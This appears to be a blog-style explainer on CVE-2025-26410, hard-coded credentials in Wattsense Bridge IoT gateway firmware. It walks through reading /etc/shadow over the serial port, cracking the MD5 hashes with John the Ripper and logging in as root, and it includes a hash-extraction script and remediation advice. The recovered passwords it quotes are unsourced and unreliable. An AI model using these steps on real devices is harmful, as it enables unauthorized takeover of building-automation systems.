In early 2025, security researchers discovered a serious vulnerability in the firmware running on all Wattsense Bridge devices. This flaw, now catalogued as CVE-2025-26410, exposes hard-coded user and root credentials embedded in the firmware. These credentials can be cracked and used to gain unauthorized access to the device through its serial interface. Let’s explore what happened, how attackers can use this bug, and how it can be prevented.

What is Wattsense Bridge?

Wattsense Bridge is an IoT gateway often used for managing building automation devices. It connects different protocols like Modbus, BACnet, and others, serving as a single hub for smart building solutions.

The vulnerability stems from two main issues

1. Hard-coded user and root credentials: All devices ship with the same login details for both normal user and root.
2. Password hash cracking: The firmware stores these credentials using simple hashing, making brute-force attacks trivial for an attacker with access.

Exposure:
Anyone with physical access to the serial interface can extract the root or user password and completely hijack the device.

How the Exploit Works

1. Access the Serial Port: Connect to the device’s serial port (using a USB-to-TTL adapter, for example).
2. Dump the Firmware / Filesystem: Using serial commands or by extracting the flash chip, get access to the /etc/shadow file or similar.
3. Crack the Password Hash: Use password recovery tools to quickly recover the plain-text credentials from the hash.

1. Getting the Hashes Out

Once connected to the serial port, you can get a root shell (often the device boots into one or gives a login prompt):

cat /etc/shadow

Sample output

root:$1$abcd1234$abcdefghijklmno:18328::99999:7:::
user:$1$abcd1234$pqrstuvwxyzab:18328::99999:7:::

2. Cracking the Password

Most Wattsense Bridge firmware uses weak hashes (like MD5, shown as $1$). With John the Ripper or Hashcat, you can crack these swiftly.

Example with John

john --format=md5crypt shadow.txt

You’ll see the recovered password — in real cases, researchers found things like

root:admin202
user:wattsense

On reboot, at the serial prompt, simply do

Wattsense login: root
Password: admin202

Why Hard-Coded Credentials are Bad

Hard-coded usernames and passwords mean that a security breach on one device is immediately a breach on *all* devices. Worse, if the hashes are easy to break, attackers can fully unlock and reprogram the Bridge, potentially spying on building environments or disrupting automation systems.

Proof-of-Concept Code

Here is a simple Python script to automate the password extraction and preliminary cracking setup (assuming the attacker already has /etc/shadow):

import re

def extract_hashes(shadow_file):
    with open(shadow_file, 'r') as sf:
        for line in sf:
            match = re.match(r'(\w+):(\$1\$[^\:]+)', line)
            if match:
                print(f"User: {match.group(1)}, Hash: {match.group(2)}")

# Usage:
extract_hashes('shadow.txt')

After this, feed the hash list into your favorite cracking tool.

Remediation

1. Update Firmware: Upgrade to BSP >= 6.4.1 as soon as possible. Later firmware removes the hard-coded backdoor user.

Change Default Passwords: Don’t ever leave devices running on default passwords.

3. Restrict Physical Access: Since this vulnerability requires serial access, ensure hardware is in a safe place.

Original References & Further Reading

- Wattsense Security Advisory
- CERT-FR Alert on CVE-2025-26410
- Exploit Database — CWE-798: Use of Hard-coded Credentials
- John the Ripper Password Cracker
- Hashcat Documentation

Conclusion

CVE-2025-26410 is a classic but critical embedded IoT vulnerability. It demonstrates why manufacturers should never ship devices with hard-coded credentials, and why regular firmware updates and physical security remain essential.

If you are managing Wattsense Bridge devices, update your firmware and review your device security today!


*Written exclusively for you — your next vulnerability insight is just a firmware away.*

Timeline

Published on: 02/11/2025 10:15:09 UTC
Last modified on: 03/18/2025 19:15:50 UTC